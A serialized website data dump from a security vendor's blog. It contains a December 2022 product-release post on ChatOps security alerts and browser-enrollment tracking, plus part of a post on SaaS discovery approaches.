"profilePicture":319321},{"url":19129},{"__typename":1528,"sys":319323,"content":319325,"title":319742,"synopsis":319743,"hashTags":118,"publishedDate":319744,"slug":319745,"tagsCollection":319746,"authorsCollection":319750},{"id":319324},"65jHaV9VU4bKozASkC3BUi",{"json":319326},{"data":319327,"content":319328,"nodeType":165},{},[319329,319336,319383,319390,319406,319446,319470,319498,319514,319520,319527,319550,319556,319563,319623,319642,319649,319656,319672,319678,319685,319701,319707,319724],{"data":319330,"content":319331,"nodeType":235},{},[319332],{"data":319333,"marks":319334,"value":319335,"nodeType":173},{},[],"Here’s what’s new on the Push platform this month:",{"data":319337,"content":319338,"nodeType":250},{},[319339,319353,319368],{"data":319340,"content":319341,"nodeType":254},{},[319342],{"data":319343,"content":319344,"nodeType":178},{},[319345,319349],{"data":319346,"marks":319347,"value":156526,"nodeType":173},{},[319348],{"type":370},{"data":319350,"marks":319351,"value":319352,"nodeType":173},{},[]," using channel messaging to discover new third-party integrations or suspicious mail rules.",{"data":319354,"content":319355,"nodeType":254},{},[319356],{"data":319357,"content":319358,"nodeType":178},{},[319359,319364],{"data":319360,"marks":319361,"value":319363,"nodeType":173},{},[319362],{"type":370},"Customize ChatOps",{"data":319365,"marks":319366,"value":319367,"nodeType":173},{},[]," with per-topic and per-user configuration.",{"data":319369,"content":319370,"nodeType":254},{},[319371],{"data":319372,"content":319373,"nodeType":178},{},[319374,319379],{"data":319375,"marks":319376,"value":319378,"nodeType":173},{},[319377],{"type":370},"Track your managed enrollment",{"data":319380,"marks":319381,"value":319382,"nodeType":173},{},[]," of employee browsers.",{"data":319384,"content":319385,"nodeType":235},{},[319386],{"data":319387,"marks":319388,"value":319389,"nodeType":173},{},[],"ChatOps channel messaging for security teams",{"data":319391,"content":319392,"nodeType":178},{},[319393,319397,319402],{"data":319394,"marks":319395,"value":319396,"nodeType":173},{},[],"Now Push ",{"data":319398,"marks":319399,"value":319401,"nodeType":173},{},[319400],{"type":370},"administrators can receive notifications",{"data":319403,"marks":319404,"value":319405,"nodeType":173},{},[]," in Microsoft Teams or Slack channels to get alerted immediately when:",{"data":319407,"content":319408,"nodeType":250},{},[319409,319428],{"data":319410,"content":319411,"nodeType":254},{},[319412],{"data":319413,"content":319414,"nodeType":178},{},[319415,319419,319424],{"data":319416,"marks":319417,"value":319418,"nodeType":173},{},[],"Push detects a ",{"data":319420,"marks":319421,"value":319423,"nodeType":173},{},[319422],{"type":370},"new third-party integration",{"data":319425,"marks":319426,"value":319427,"nodeType":173},{},[]," in your environment. ",{"data":319429,"content":319430,"nodeType":254},{},[319431],{"data":319432,"content":319433,"nodeType":178},{},[319434,319438,319443],{"data":319435,"marks":319436,"value":319437,"nodeType":173},{},[],"A user contacted via ChatOps confirms that a ",{"data":319439,"marks":319440,"value":319442,"nodeType":173},{},[319441],{"type":370},"mail rule looks suspicious",{"data":319444,"marks":319445,"value":1477,"nodeType":173},{},[],{"data":319447,"content":319448,"nodeType":178},{},[319449,319453,319458,319461,319466],{"data":319450,"marks":319451,"value":319452,"nodeType":173},{},[],"We recommend setting up channel messaging in your relevant team channels to ",{"data":319454,"marks":319455,"value":319457,"nodeType":173},{},[319456],{"type":370},"stay informed",{"data":319459,"marks":319460,"value":1464,"nodeType":173},{},[],{"data":319462,"marks":319463,"value":319465,"nodeType":173},{},[319464],{"type":370},"reduce your response time",{"data":319467,"marks":319468,"value":319469,"nodeType":173},{},[]," to important issues. ",{"data":319471,"content":319472,"nodeType":178},{},[319473,319477,319485,319489,319494],{"data":319474,"marks":319475,"value":319476,"nodeType":173},{},[],"Configure ChatOps messaging for your security team from the Push platform by going to ",{"data":319478,"content":319480,"nodeType":186},{"uri":319479},"https://pushsecurity.com/app/chatops/",[319481],{"data":319482,"marks":319483,"value":156537,"nodeType":173},{},[319484],{"type":370},{"data":319486,"marks":319487,"value":319488,"nodeType":173},{},[]," > ",{"data":319490,"marks":319491,"value":319493,"nodeType":173},{},[319492],{"type":370},"Security team chat topics",{"data":319495,"marks":319496,"value":319497,"nodeType":173},{},[],", and toggle on the topics you’re interested in. You can specify which channel or channels where you want to receive each type of notification.",{"data":319499,"content":319500,"nodeType":178},{},[319501,319505,319511],{"data":319502,"marks":319503,"value":319504,"nodeType":173},{},[],"What other topics, events, or anomalies would you like to receive alerts about via ChatOps for security teams? Send us a quick note with ideas to ",{"data":319506,"content":319507,"nodeType":186},{"uri":301319},[319508],{"data":319509,"marks":319510,"value":301322,"nodeType":173},{},[],{"data":319512,"marks":319513,"value":1477,"nodeType":173},{},[],{"data":319515,"content":319519,"nodeType":312},{"target":319516},{"sys":319517},{"id":319518,"type":317,"linkType":318},"1s4CMXgYCAppW7zgR7XNBy",[],{"data":319521,"content":319522,"nodeType":235},{},[319523],{"data":319524,"marks":319525,"value":319526,"nodeType":173},{},[],"More granular controls for ChatOps",{"data":319528,"content":319529,"nodeType":178},{},[319530,319534,319539,319547],{"data":319531,"marks":319532,"value":319533,"nodeType":173},{},[],"We know how important it is to get the messaging right to your users, so ",{"data":319535,"marks":319536,"value":319538,"nodeType":173},{},[319537],{"type":370},"we’ve improved the controls of our ",{"data":319540,"content":319541,"nodeType":186},{"uri":319479},[319542],{"data":319543,"marks":319544,"value":319546,"nodeType":173},{},[319545],{"type":370},"ChatOps feature",{"data":319548,"marks":319549,"value":1477,"nodeType":173},{},[],{"data":319551,"content":319555,"nodeType":312},{"target":319552},{"sys":319553},{"id":319554,"type":317,"linkType":318},"7E9csiKyZ4dlfnBvClY32E",[],{"data":319557,"content":319558,"nodeType":178},{},[319559],{"data":319560,"marks":319561,"value":319562,"nodeType":173},{},[],"You can now:",{"data":319564,"content":319565,"nodeType":250},{},[319566,319585,319604],{"data":319567,"content":319568,"nodeType":254},{},[319569],{"data":319570,"content":319571,"nodeType":178},{},[319572,319576,319581],{"data":319573,"marks":319574,"value":319575,"nodeType":173},{},[],"Enable ChatOps for ",{"data":319577,"marks":319578,"value":319580,"nodeType":173},{},[319579],{"type":370},"individual users",{"data":319582,"marks":319583,"value":319584,"nodeType":173},{},[]," to make it easier to test and plan your ChatOps rollout.",{"data":319586,"content":319587,"nodeType":254},{},[319588],{"data":319589,"content":319590,"nodeType":178},{},[319591,319595,319600],{"data":319592,"marks":319593,"value":319594,"nodeType":173},{},[],"Control exactly ",{"data":319596,"marks":319597,"value":319599,"nodeType":173},{},[319598],{"type":370},"which topics",{"data":319601,"marks":319602,"value":319603,"nodeType":173},{},[]," your users will receive ChatOps messages about.",{"data":319605,"content":319606,"nodeType":254},{},[319607],{"data":319608,"content":319609,"nodeType":178},{},[319610,319614,319619],{"data":319611,"marks":319612,"value":319613,"nodeType":173},{},[],"See ",{"data":319615,"marks":319616,"value":319618,"nodeType":173},{},[319617],{"type":370},"how many messages",{"data":319620,"marks":319621,"value":319622,"nodeType":173},{},[]," Push has sent for each topic you’ve enabled.",{"data":319624,"content":319625,"nodeType":178},{},[319626,319630,319638],{"data":319627,"marks":319628,"value":319629,"nodeType":173},{},[],"To make it easier to understand the wording of messages a user will receive for each use case, check out our ",{"data":319631,"content":319633,"nodeType":186},{"uri":319632},"https://pushsecurity.com/kb/10064/",[319634],{"data":319635,"marks":319636,"value":319637,"nodeType":173},{},[],"help guides",{"data":319639,"marks":319640,"value":319641,"nodeType":173},{},[]," linked from the Push platform for each ChatOps topic.",{"data":319643,"content":319644,"nodeType":178},{},[319645],{"data":319646,"marks":319647,"value":319648,"nodeType":173},{},[],"We know you’re going to want more detail on ChatOps, such as who has been sent a message, the outcome of those conversations, and more. We’re actively working on more features, so stay tuned to these release notes!",{"data":319650,"content":319651,"nodeType":235},{},[319652],{"data":319653,"marks":319654,"value":319655,"nodeType":173},{},[],"Track your managed enrollment of browsers",{"data":319657,"content":319658,"nodeType":178},{},[319659,319663,319668],{"data":319660,"marks":319661,"value":319662,"nodeType":173},{},[],"Get ",{"data":319664,"marks":319665,"value":319667,"nodeType":173},{},[319666],{"type":370},"better visibility on the progress of your managed rollout",{"data":319669,"marks":319670,"value":319671,"nodeType":173},{},[]," of the Push browser extension with a new status visible on the Browsers page of the Push admin console.",{"data":319673,"content":319677,"nodeType":312},{"target":319674},{"sys":319675},{"id":319676,"type":317,"linkType":318},"7rTETjrNHJKpU0HKiVckeL",[],{"data":319679,"content":319680,"nodeType":178},{},[319681],{"data":319682,"marks":319683,"value":319684,"nodeType":173},{},[],"Enrolling an employee’s browser in Push via a managed deployment is a two-step process: First, you install the Push browser extension. Next, the extension waits for user activity to help identify the user of the browser and complete enrollment.",{"data":319686,"content":319687,"nodeType":178},{},[319688,319692,319697],{"data":319689,"marks":319690,"value":319691,"nodeType":173},{},[],"The status we’ve added will help you ",{"data":319693,"marks":319694,"value":319696,"nodeType":173},{},[319695],{"type":370},"track which browsers haven’t yet identified the browser user",{"data":319698,"marks":319699,"value":319700,"nodeType":173},{},[]," in order to complete enrollment and show up in Push. You can also use this status to identify browser profiles that the Push extension is avoiding enrolling because they’re a personal browser profile or are being used by an employee without a license in Push.",{"data":319702,"content":319706,"nodeType":312},{"target":319703},{"sys":319704},{"id":319705,"type":317,"linkType":318},"3u1PyOvJ2lqAaz8umhmvmM",[],{"data":319708,"content":319709,"nodeType":178},{},[319710,319714,319721],{"data":319711,"marks":319712,"value":319713,"nodeType":173},{},[],"Curious how the Push browser extension identifies the user of a browser in order to complete enrollment? Check out this ",{"data":319715,"content":319717,"nodeType":186},{"uri":319716},"https://pushsecurity.com/kb/10063",[319718],{"data":319719,"marks":319720,"value":21642,"nodeType":173},{},[],{"data":319722,"marks":319723,"value":1477,"nodeType":173},{},[],{"data":319725,"content":319726,"nodeType":178},{},[319727,319731,319738],{"data":319728,"marks":319729,"value":319730,"nodeType":173},{},[],"Stay tuned for more soon and ",{"data":319732,"content":319733,"nodeType":186},{"uri":301319},[319734],{"data":319735,"marks":319736,"value":319737,"nodeType":173},{},[],"drop us a line",{"data":319739,"marks":319740,"value":319741,"nodeType":173},{},[]," with your feature requests!","Product Release: December 2022","Here’s what’s new on the Push platform for December 2022.","2022-12-08T00:00:00.000Z","product-release-december-2022",{"items":319747},[319748],{"sys":319749,"name":18399},{"id":18398},{"items":319751},[319752],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":319753},{"url":19129},{"items":319755},[319756],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":319757},{"url":19129},{"json":319759,"links":320057},{"data":319760,"content":319761,"nodeType":165},{},[319762,319768,319816,319822,319848,319854,319859,319875,319881,319896,319901,319917,319923,319945,319950,319966,319972,319985,319990,320006,320012,320036,320041],{"data":319763,"content":319764,"nodeType":235},{},[319765],{"data":319766,"marks":319767,"value":285269,"nodeType":173},{},[],{"data":319769,"content":319770,"nodeType":250},{},[319771,319780,319789,319798,319807],{"data":319772,"content":319773,"nodeType":254},{},[319774],{"data":319775,"content":319776,"nodeType":178},{},[319777],{"data":319778,"marks":319779,"value":285282,"nodeType":173},{},[],{"data":319781,"content":319782,"nodeType":254},{},[319783],{"data":319784,"content":319785,"nodeType":178},{},[319786],{"data":319787,"marks":319788,"value":285292,"nodeType":173},{},[],{"data":319790,"content":319791,"nodeType":254},{},[319792],{"data":319793,"content":319794,"nodeType":178},{},[319795],{"data":319796,"marks":319797,"value":285302,"nodeType":173},{},[],{"data":319799,"content":319800,"nodeType":254},{},[319801],{"data":319802,"content":319803,"nodeType":178},{},[319804],{"data":319805,"marks":319806,"value":285312,"nodeType":173},{},[],{"data":319808,"content":319809,"nodeType":254},{},[319810],{"data":319811,"content":319812,"nodeType":178},{},[319813],{"data":319814,"marks":319815,"value":285322,"nodeType":173},{},[],{"data":319817,"content":319818,"nodeType":235},{},[319819],{"data":319820,"marks":319821,"value":285282,"nodeType":173},{},[],{"data":319823,"content":319824,"nodeType":178},{},[319825,319828,319834,319837,319845],{"data":319826,"marks":319827,"value":65284,"nodeType":173},{},[],{"data":319829,"content":319830,"nodeType":186},{"uri":285337},[319831],{"data":319832,"marks":319833,"value":285342,"nodeType":173},{},[],{"data":319835,"marks":319836,"value":285346,"nodeType":173},{},[],{"data":319838,"content":319841,"nodeType":1698},{"target":319839},{"sys":319840},{"id":285090,"type":317,"linkType":318},[319842],{"data":319843,"marks":319844,"value":285355,"nodeType":173},{},[],{"data":319846,"marks":319847,"value":1477,"nodeType":173},{},[],{"data":319849,"content":319850,"nodeType":178},{},[319851],{"data":319852,"marks":319853,"value":285365,"nodeType":173},{},[],{"data":319855,"content":319858,"nodeType":312},{"target":319856},{"sys":319857},{"id":285370,"type":317,"linkType":318},[],{"data":319860,"content":319861,"nodeType":178},{},[319862,319865,319872],{"data":319863,"marks":319864,"value":37,"nodeType":173},{},[],{"data":319866,"content":319867,"nodeType":186},{"uri":285337},[319868],{"data":319869,"marks":319870,"value":148770,"nodeType":173},{},[319871],{"type":370},{"data":319873,"marks":319874,"value":37,"nodeType":173},{},[],{"data":319876,"content":319877,"nodeType":235},{},[319878],{"data":319879,"marks":319880,"value":285292,"nodeType":173},{},[],{"data":319882,"content":319883,"nodeType":178},{},[319884,319887,319893],{"data":319885,"marks":319886,"value":285400,"nodeType":173},{},[],{"data":319888,"content":319889,"nodeType":186},{"uri":285403},[319890],{"data":319891,"marks":319892,"value":285408,"nodeType":173},{},[],{"data":319894,"marks":319895,"value":285412,"nodeType":173},{},[],{"data":319897,"content":319900,"nodeType":312},{"target":319898},{"sys":319899},{"id":285417,"type":317,"linkType":318},[],{"data":319902,"content":319903,"nodeType":178},{},[319904,319907,319914],{"data":319905,"marks":319906,"value":37,"nodeType":173},{},[],{"data":319908,"content":319909,"nodeType":186},{"uri":285427},[319910],{"data":319911,"marks":319912,"value":148770,"nodeType":173},{},[319913],{"type":370},{"data":319915,"marks":319916,"value":37,"nodeType":173},{},[],{"data":319918,"content":319919,"nodeType":235},{},[319920],{"data":319921,"marks":319922,"value":285442,"nodeType":173},{},[],{"data":319924,"content":319925,"nodeType":178},{},[319926,319929,319935,319938,319942],{"data":319927,"marks":319928,"value":285449,"nodeType":173},{},[],{"data":319930,"content":319931,"nodeType":186},{"uri":285452},[319932],{"data":319933,"marks":319934,"value":285457,"nodeType":173},{},[],{"data":319936,"marks":319937,"value":285461,"nodeType":173},{},[],{"data":319939,"marks":319940,"value":18734,"nodeType":173},{},[319941],{"type":370},{"data":319943,"marks":319944,"value":285469,"nodeType":173},{},[],{"data":319946,"content":319949,"nodeType":312},{"target":319947},{"sys":319948},{"id":285474,"type":317,"linkType":318},[],{"data":319951,"content":319952,"nodeType":178},{},[319953,319956,319963],{"data":319954,"marks":319955,"value":37,"nodeType":173},{},[],{"data":319957,"content":319958,"nodeType":186},{"uri":285484},[319959],{"data":319960,"marks":319961,"value":148770,"nodeType":173},{},[319962],{"type":370},{"data":319964,"marks":319965,"value":37,"nodeType":173},{},[],{"data":319967,"content":319968,"nodeType":235},{},[319969],{"data":319970,"marks":319971,"value":285312,"nodeType":173},{},[],{"data":319973,"content":319974,"nodeType":178},{},[319975,319978,319982],{"data":319976,"marks":319977,"value":285505,"nodeType":173},{},[],{"data":319979,"marks":319980,"value":285510,"nodeType":173},{},[319981],{"type":370},{"data":319983,"marks":319984,"value":285514,"nodeType":173},{},[],{"data":319986,"content":319989,"nodeType":312},{"target":319987},{"sys":319988},{"id":285519,"type":317,"linkType":318},[],{"data":319991,"content":319992,"nodeType":178},{},[319993,319996,320003],{"data":319994,"marks":319995,"value":37,"nodeType":173},{},[],{"data":319997,"content":319998,"nodeType":186},{"uri":285529},[319999],{"data":320000,"marks":320001,"value":148770,"nodeType":173},{},[320002],{"type":370},{"data":320004,"marks":320005,"value":37,"nodeType":173},{},[],{"data":320007,"content":320008,"nodeType":235},{},[320009],{"data":320010,"marks":320011,"value":285544,"nodeType":173},{},[],{"data":320013,"content":320014,"nodeType":178},{},[320015,320018,320024,320027,320033],{"data":320016,"marks":320017,"value":285551,"nodeType":173},{},[],{"data":320019,"content":320020,"nodeType":186},{"uri":285554},[320021],{"data":320022,"marks":320023,"value":3262,"nodeType":173},{},[],{"data":320025,"marks":320026,"value":285562,"nodeType":173},{},[],{"data":320028,"content":320029,"nodeType":186},{"uri":285565},[320030],{"data":320031,"marks":320032,"value":285570,"nodeType":173},{},[],{"data":320034,"marks":320035,"value":285574,"nodeType":173},{},[],{"data":320037,"content":320040,"nodeType":312},{"target":320038},{"sys":320039},{"id":285579,"type":317,"linkType":318},[],{"data":320042,"content":320043,"nodeType":178},{},[320044,320047,320054],{"data":320045,"marks":320046,"value":37,"nodeType":173},{},[],{"data":320048,"content":320049,"nodeType":186},{"uri":285554},[320050],{"data":320051,"marks":320052,"value":285594,"nodeType":173},{},[320053],{"type":370},{"data":320055,"marks":320056,"value":37,"nodeType":173},{},[],{"entries":320058},{"inline":320059,"hyperlink":320060,"block":320063},[],[320061],{"sys":320062,"__typename":6655,"title":301885,"slug":301886,"articleId":301887},{"id":285090},[320064,320069,320074,320079,320084],{"sys":320065,"__typename":5345,"title":320066,"caption":118,"layoutMode":118,"file":320067},{"id":285370},"Integration delete gif - release notes - June 2023",{"url":320068,"width":113587,"height":211316},"https://images.ctfassets.net/y1cdw1ablpvd/5eQ0fFa6pwWJycwCKjhDn7/8dd04a2daf13008f707d379bb6538ece/delete_integration.gif",{"sys":320070,"__typename":5345,"title":320071,"caption":118,"layoutMode":118,"file":320072},{"id":285417},"New SaaS page gif - release notes - June 2023",{"url":320073,"width":75589,"height":211316},"https://images.ctfassets.net/y1cdw1ablpvd/15KxDbR7YpZ25cKMJtAl0B/3c7de7a2a1c7e2b20376a9652d2f9712/saas_filters.gif",{"sys":320075,"__typename":5345,"title":320076,"caption":118,"layoutMode":118,"file":320077},{"id":285474},"Password manager detection gif - release notes - June 2023",{"url":320078,"width":113587,"height":315603},"https://images.ctfassets.net/y1cdw1ablpvd/6hfabsfUEtYtAIwe2DUkgJ/37797db62b357cd152b485f3e985492d/labs_pwd_mgr.gif",{"sys":320080,"__typename":5345,"title":320081,"caption":118,"layoutMode":118,"file":320082},{"id":285519},"First seen gif for licensing - release notes - June 2023",{"url":320083,"width":113587,"height":280233},"https://images.ctfassets.net/y1cdw1ablpvd/5J3eJ4OH7FsShRD3IdIQ4U/f4191de3da0037e6dc6f8bc0e20a3620/first_seen.gif",{"sys":320085,"__typename":5345,"title":320086,"caption":118,"layoutMode":118,"file":320087},{"id":285579},"Help Center gif - release notes - June 2023",{"url":320088,"width":113587,"height":315603},"https://images.ctfassets.net/y1cdw1ablpvd/2klRoO3gHCuaM1TDrizx0t/567b6dcc0466b01d1d63f1730247a0c1/help_center.gif","content:blog:product-release-june-2023.json","blog/product-release-june-2023.json","blog/product-release-june-2023",{"_path":320093,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":320094,"ogImage":118,"summary":320096,"title":286444,"subtitle":118,"metaTitle":320107,"synopsis":314902,"hashTags":118,"publishedDate":314903,"slug":286445,"tagsCollection":320108,"relatedBlogPostsCollection":320114,"authorsCollection":320990,"content":320994,"_id":321315,"_type":5439,"_source":5440,"_file":321316,"_stem":321317,"_extension":5439},"/blog/want-to-discover-the-full-extent-of-your-saas-sprawl-embrace-browser",{"id":273937,"publishedAt":320095},"2026-01-30T09:39:06.711Z",{"json":320097},{"data":320098,"content":320099,"nodeType":165},{},[320100],{"data":320101,"content":320102,"nodeType":178},{},[320103],{"data":320104,"marks":320105,"value":320106,"nodeType":173},{},[],"Browser extensions are the most effective SaaS discovery tool because they can capture employee SaaS use and adoption in real time, as employees sign up. The browser also allows us to work with the user to guide them to use SaaS more securely right where they’re working - in the browser.","Use browser extension to see the extent of your SaaS sprawl",{"items":320109},[320110,320112],{"sys":320111,"name":274157},{"id":274156},{"sys":320113,"name":26137},{"id":26136},{"items":320115},[320116,320410],{"__typename":1528,"sys":320117,"content":320118,"title":294049,"synopsis":294050,"hashTags":118,"publishedDate":294051,"slug":294052,"tagsCollection":320400,"authorsCollection":320406},{"id":293723},{"json":320119},{"data":320120,"content":320121,"nodeType":165},{},[320122,320128,320145,320151,320157,320163,320169,320175,320181,320187,320193,320199,320205,320211,320217,320230,320236,320242,320248,320254,320260,320266,320281,320287,320293,320299,320305,320311,320318,320348,320355,320385],{"data":320123,"content":320124,"nodeType":178},{},[320125],{"data":320126,"marks":320127,"value":293734,"nodeType":173},{},[],{"data":320129,"content":320130,"nodeType":178},{},[320131,320134,320142],{"data":320132,"marks":320133,"value":293741,"nodeType":173},{},[],{"data":320135,"content":320138,"nodeType":1698},{"target":320136},{"sys":320137},{"id":282056,"type":317,"linkType":318},[320139],{"data":320140,"marks":320141,"value":247581,"nodeType":173},{},[],{"data":320143,"marks":320144,"value":293753,"nodeType":173},{},[],{"data":320146,"content":320147,"nodeType":178},{},[320148],{"data":320149,"marks":320150,"value":293760,"nodeType":173},{},[],{"data":320152,"content":320153,"nodeType":178},{},[320154],{"data":320155,"marks":320156,"value":293767,"nodeType":173},{},[],{"data":320158,"content":320159,"nodeType":178},{},[320160],{"data":320161,"marks":320162,"value":293774,"nodeType":173},{},[],{"data":320164,"content":320165,"nodeType":178},{},[320166],{"data":320167,"marks":320168,"value":293781,"nodeType":173},{},[],{"data":320170,"content":320171,"nodeType":235},{},[320172],{"data":320173,"marks":320174,"value":293788,"nodeType":173},{},[],{"data":320176,"content":320177,"nodeType":178},{},[320178],{"data":320179,"marks":320180,"value":293795,"nodeType":173},{},[],{"data":320182,"content":320183,"nodeType":178},{},[320184],{"data":320185,"marks":320186,"value":293802,"nodeType":173},{},[],{"data":320188,"content":320189,"nodeType":178},{},[320190],{"data":320191,"marks":320192,"value":293809,"nodeType":173},{},[],{"data":320194,"content":320195,"nodeType":178},{},[320196],{"data":320197,"marks":320198,"value":293816,"nodeType":173},{},[],{"data":320200,"content":320201,"nodeType":235},{},[320202],{"data":320203,"marks":320204,"value":293823,"nodeType":173},{},[],{"data":320206,"content":320207,"nodeType":178},{},[320208],{"data":320209,"marks":320210,"value":293830,"nodeType":173},{},[],{"data":320212,"content":320213,"nodeType":178},{},[320214],{"data":320215,"marks":320216,"value":293837,"nodeType":173},{},[],{"data":320218,"content":320219,"nodeType":178},{},[320220,320223,320227],{"data":320221,"marks":320222,"value":293844,"nodeType":173},{},[],{"data":320224,"marks":320225,"value":293849,"nodeType":173},{},[320226],{"type":1646},{"data":320228,"marks":320229,"value":293853,"nodeType":173},{},[],{"data":320231,"content":320232,"nodeType":178},{},[320233],{"data":320234,"marks":320235,"value":293860,"nodeType":173},{},[],{"data":320237,"content":320238,"nodeType":235},{},[320239],{"data":320240,"marks":320241,"value":293867,"nodeType":173},{},[],{"data":320243,"content":320244,"nodeType":178},{},[320245],{"data":320246,"marks":320247,"value":293874,"nodeType":173},{},[],{"data":320249,"content":320250,"nodeType":178},{},[320251],{"data":320252,"marks":320253,"value":293881,"nodeType":173},{},[],{"data":320255,"content":320256,"nodeType":178},{},[320257],{"data":320258,"marks":320259,"value":293888,"nodeType":173},{},[],{"data":320261,"content":320262,"nodeType":178},{},[320263],{"data":320264,"marks":320265,"value":293895,"nodeType":173},{},[],{"data":320267,"content":320268,"nodeType":178},{},[320269,320272,320278],{"data":320270,"marks":320271,"value":293902,"nodeType":173},{},[],{"data":320273,"content":320274,"nodeType":186},{"uri":293905},[320275],{"data":320276,"marks":320277,"value":293910,"nodeType":173},{},[],{"data":320279,"marks":320280,"value":197,"nodeType":173},{},[],{"data":320282,"content":320283,"nodeType":235},{},[320284],{"data":320285,"marks":320286,"value":293920,"nodeType":173},{},[],{"data":320288,"content":320289,"nodeType":178},{},[320290],{"data":320291,"marks":320292,"value":293927,"nodeType":173},{},[],{"data":320294,"content":320295,"nodeType":178},{},[320296],{"data":320297,"marks":320298,"value":293934,"nodeType":173},{},[],{"data":320300,"content":320301,"nodeType":235},{},[320302],{"data":320303,"marks":320304,"value":40632,"nodeType":173},{},[],{"data":320306,"content":320307,"nodeType":178},{},[320308],{"data":320309,"marks":320310,"value":293947,"nodeType":173},{},[],{"data":320312,"content":320313,"nodeType":178},{},[320314],{"data":320315,"marks":320316,"value":293955,"nodeType":173},{},[320317],{"type":370},{"data":320319,"content":320320,"nodeType":250},{},[320321,320330,320339],{"data":320322,"content":320323,"nodeType":254},{},[320324],{"data":320325,"content":320326,"nodeType":178},{},[320327],{"data":320328,"marks":320329,"value":293968,"nodeType":173},{},[],{"data":320331,"content":320332,"nodeType":254},{},[320333],{"data":320334,"content":320335,"nodeType":178},{},[320336],{"data":320337,"marks":320338,"value":293978,"nodeType":173},{},[],{"data":320340,"content":320341,"nodeType":254},{},[320342],{"data":320343,"content":320344,"nodeType":178},{},[320345],{"data":320346,"marks":320347,"value":293988,"nodeType":173},{},[],{"data":320349,"content":320350,"nodeType":178},{},[320351],{"data":320352,"marks":320353,"value":293996,"nodeType":173},{},[320354],{"type":370},{"data":320356,"content":320357,"nodeType":250},{},[320358,320367,320376],{"data":320359,"content":320360,"nodeType":254},{},[320361],{"data":320362,"content":320363,"nodeType":178},{},[320364],{"data":320365,"marks":320366,"value":294009,"nodeType":173},{},[],{"data":320368,"content":320369,"nodeType":254},{},[320370],{"data":320371,"content":320372,"nodeType":178},{},[320373],{"data":320374,"marks":320375,"value":294019,"nodeType":173},{},[],{"data":320377,"content":320378,"nodeType":254},{},[320379],{"data":320380,"content":320381,"nodeType":178},{},[320382],{"data":320383,"marks":320384,"value":294029,"nodeType":173},{},[],{"data":320386,"content":320387,"nodeType":178},{},[320388,320391,320397],{"data":320389,"marks":320390,"value":294036,"nodeType":173},{},[],{"data":320392,"content":320393,"nodeType":186},{"uri":294039},[320394],{"data":320395,"marks":320396,"value":294044,"nodeType":173},{},[],{"data":320398,"marks":320399,"value":294048,"nodeType":173},{},[],{"items":320401},[320402,320404],{"sys":320403,"name":274157},{"id":274156},{"sys":320405,"name":26133},{"id":26132},{"items":320407},[320408],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":320409},{"url":13981},{"__typename":1528,"sys":320411,"content":320412,"title":298859,"synopsis":320972,"hashTags":320973,"publishedDate":320979,"slug":298860,"tagsCollection":320980,"authorsCollection":320986},{"id":282056},{"json":320413},{"data":320414,"content":320415,"nodeType":165},{},[320416,320423,320430,320437,320444,320451,320476,320483,320490,320497,320504,320515,320522,320561,320586,320593,320600,320616,320623,320630,320646,320653,320661,320677,320684,320691,320698,320706,320713,320720,320727,320754,320817,320824,320831,320837,320853,320860,320876,320883,320895,320902,320922,320928,320945],{"data":320417,"content":320418,"nodeType":178},{},[320419],{"data":320420,"marks":320421,"value":320422,"nodeType":173},{},[],"Over the past few years, there’s been massive growth in the number of SaaS apps used for work. With that comes new challenges – how do you allow employees to take advantage of all the SaaS the world has to offer without locking it all down and stifling innovation? How do you figure out if you can trust all these new third parties with access to your data? Well, the first step is figuring out which apps employees are actually using, so that’s where we’re starting.",{"data":320424,"content":320425,"nodeType":178},{},[320426],{"data":320427,"marks":320428,"value":320429,"nodeType":173},{},[],"We’ve compiled a list of various options and approaches we’ve seen people take to SaaS discovery, each with their own pros and cons. ",{"data":320431,"content":320432,"nodeType":169},{},[320433],{"data":320434,"marks":320435,"value":320436,"nodeType":173},{},[],"Why is SaaS discovery so hard?",{"data":320438,"content":320439,"nodeType":178},{},[320440],{"data":320441,"marks":320442,"value":320443,"nodeType":173},{},[],"\nSomething to note straight off the bat is that with all the data-driven approaches we’re about to cover, you have to know how to extract SaaS use out of that data. That’s one of the reasons SaaS discovery is so hard. With the roll-your-own approaches in this post, you’ll be able to identify some common apps (like Trello, Slack, Dropbox, etc.), but what about all the new or lesser-known apps? Unfortunately, trying to keep track of all the SaaS apps that are available to employees is really difficult. There’s not really a great master list available on the Internet for you to cross-reference with your data.",{"data":320445,"content":320446,"nodeType":178},{},[320447],{"data":320448,"marks":320449,"value":320450,"nodeType":173},{},[],"That means that all of these roll-your-own approaches are dependent on you knowing what you’re looking for. If you must know what SaaS you’re looking for in order to determine if an asset is actually a SaaS app, you’re going to be left with quite a few blindspots given there seem to be new apps launching every day. ",{"data":320452,"content":320453,"nodeType":178},{},[320454,320458,320463,320467,320472],{"data":320455,"marks":320456,"value":320457,"nodeType":173},{},[],"The second hurdle with a roll-your-own discovery approach is differentiating between SaaS ",{"data":320459,"marks":320460,"value":320462,"nodeType":173},{},[320461],{"type":1646},"access",{"data":320464,"marks":320465,"value":320466,"nodeType":173},{},[]," and SaaS ",{"data":320468,"marks":320469,"value":320471,"nodeType":173},{},[320470],{"type":1646},"usage",{"data":320473,"marks":320474,"value":320475,"nodeType":173},{},[],". Just because an employee accesses a SaaS website, it doesn’t mean they’re using their app. Most of the data sources will produce a ton of domains, IPs, etc. for you to sift through, but differentiating access and usage based on this information alone will produce a large number of false positives unless you can correlate it with other data sources (we suggest some below). You will likely also want to know things like exactly who the users, owners and administrators of the app are which will be all but impossible from this “access” data alone.",{"data":320477,"content":320478,"nodeType":178},{},[320479],{"data":320480,"marks":320481,"value":320482,"nodeType":173},{},[],"If we ignore for the moment the difficulties in extracting information about SaaS usage, let’s run through your options for data sources and see which ones will give you the most useful data.",{"data":320484,"content":320485,"nodeType":169},{},[320486],{"data":320487,"marks":320488,"value":320489,"nodeType":173},{},[],"Collecting financial records",{"data":320491,"content":320492,"nodeType":178},{},[320493],{"data":320494,"marks":320495,"value":320496,"nodeType":173},{},[],"Looking through invoices can provide some visibility into paid SaaS apps, which is probably the lowest false positive data source. However, there are blind spots - you won’t see any free tier or trial accounts, nor will you get any useful business context about who’s using it, how they’re using it, if logins are secure, and what data it has access to. That said, it’s a quick and dirty way to get a partial view of SaaS usage, and might be the best place to 